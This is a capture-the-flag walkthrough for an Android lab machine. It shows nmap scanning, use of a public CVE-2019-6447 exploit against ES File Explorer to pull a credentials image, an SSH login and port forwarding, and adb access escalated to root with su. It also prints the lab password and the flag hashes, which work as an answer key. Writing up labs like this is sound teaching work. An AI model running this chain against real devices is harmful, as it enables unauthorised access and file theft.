Enumeration
As usual, let's start with nmap:
nmap -sV -Pn -p- 10.10.10.247
I googled the following:
port 5555 android --> adb (android debug bridge)
port 5977 android --> found out there is android vulnerability in ES file explorer - CVE-2019-6447. Basically this vulnerability allow attackers on the same network to execute applications and read files on the android!
From your attackers' machine do the following:
Go to exploit database https://www.exploit-db.com/
Click on Search EDB
and type 2019-6447 in the CVE field
Click on the exploit
Download the exploit
Go to your Downloads folder:
cd Downloads
ls
Let's try to run this exploit using:
python3 50070.py
Looks like we need to add a command followed by the IP. If we go back to the exploit on the exploit-db website, it tells us we can use the command listPics to list all the pictures on the android so let's try that:
python3 50070.py listPics 10.10.10.247
Looks like there is an interesting picture called creds.jpg
Let's try to get this file using getFile:
python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
The file has been downloaded on our machine as out.dat, let's check it out:
When we open the file we see the following:
Looks like a password for username kristi:
Kr1sT!5h@Rp3xPl0r3!
We can see from the nmap that port 2222 is open, which is ssh. So let's try to ssh using these credentials:
ssh kristi@10.10.10.247 -p 2222
Type yes and press enter
enter the password we just found
Kr1sT!5h@Rp3xPl0r3!
We are in!
id
ls
cd sdcard
ls
cat user.txt
f32017174c7c7e8f50c6da52891ae250
Congratulations! You got the user flag!
cd ..
ls
Let's find out on which port the android is listening by typing:
netstat -tulpn | grep LISTEN
We can see port 5555 is listening.
Port forwarding
What is local port forwarding:
Local port forwarding is configured using the -L option:
ssh -L 5555:machine2:5555 machine1
This opens a connection on the machine1 and forwards any connection to port 5555 on machine1 to port 5555 on machine2
For our case let's use it and type:
ssh -L 5555:localhost:5555 kristi@IP -p 2222
This opens a connection to htb target machine (explore machine), and forwards any connection to port 5555 on the machine to port 5555 on my localhost (VM)
We know that our target (htb machine) is listening on port 5555 (netstat told us)
Open a new command prompt on your VM
ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222
Enter the password we found earlier
Kr1sT!5h@Rp3xPl0r3!
adb
ADB - Android Debug Bridge is a command line tool that allow you to communicate with an android device. It is used by developers mainly to install or debug apps, and it also comes with a unix shell that can be used to run several commands on the device.
An Android device emulator is just a virtual device that runs on your computer that allow you to develop and test your android app without using a physical android device.
Open a new command prompt on your VM
sudo apt install adb
Press Y to continue
sudo apt-get update
sudo apt install adb
press Y to continue.
This time it worked, we have installed adb successfully.
adb devices
adb connect localhost:5555
adb devices
adb shell
adb localhost shell
adb -s localhost shell
whoami
su
The su command switches to the super user – or root user
whoami
we are now root!
ls
cd data
ls
cat root.txt
f04fc82b6d49b41c9b08982be59338c5
Congratulations! You got the root flag!
Comments